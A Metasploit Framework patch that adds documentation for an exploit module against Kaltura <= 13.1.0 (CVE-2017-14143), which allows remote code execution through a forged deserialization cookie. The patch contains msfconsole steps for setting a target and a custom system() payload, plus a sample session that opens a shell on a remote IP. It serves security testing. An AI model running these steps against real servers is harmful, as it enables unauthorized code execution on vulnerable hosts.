From 8f2de5cd413dabee7bf3a2befdf79335159d4061 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 23 Jan 2018 12:45:59 -0600 Subject: [PATCH] Land #9205, Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143) Merge branch 'land-9205' into upstream-master --- .../http/kaltura_unserialize_cookie_rce.md | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md diff --git a/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md b/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md new file mode 100644 index 0000000000..23d00e46d7 --- /dev/null +++ b/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md @@ -0,0 +1,42 @@ +## Description + +The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie. + + +## Vulnerable Application + + This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization. + Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143. + Installation of Kaltura is difficult, but here is an installation guide: + https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md + + +## Verification Steps + + 1. Start msfconsole + 2. `use exploit/linux/http/kaltura_unserialize_cookie_rce` + 3. `set RHOST https://example.com (or IP address)` + 4. `set ENTRYID 0_xxxxxxxx` + 5. `set payload generic/custom` + 6. `set payloadstr "system('command you want to execute, eg.- ls -la');"` + 7. `run` + +## Scenarios + + ``` + msf use exploits/linux/http/kaltura_unserialize_cookie_rce + msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202 + RHOST => 46.101.209.202 + msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16 + LHOST => 192.168.1.16 + msf exploit(kalkutra_unseialize_cookie_rce)>check + [+] 46.101.209.202:4444 The target is vulnerable. + msf exploit(kalkutra_unseialize_cookie_rce)>run + [*] Started bind handler + [*] Output: + [*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200 + + id + uid=33(www-data) gid=33(www-data) groups=33(www-data) + ``` +